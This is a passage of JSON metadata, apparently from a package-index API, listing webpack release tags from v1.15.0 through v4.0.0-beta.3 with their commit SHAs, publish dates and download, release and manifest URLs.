:"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_u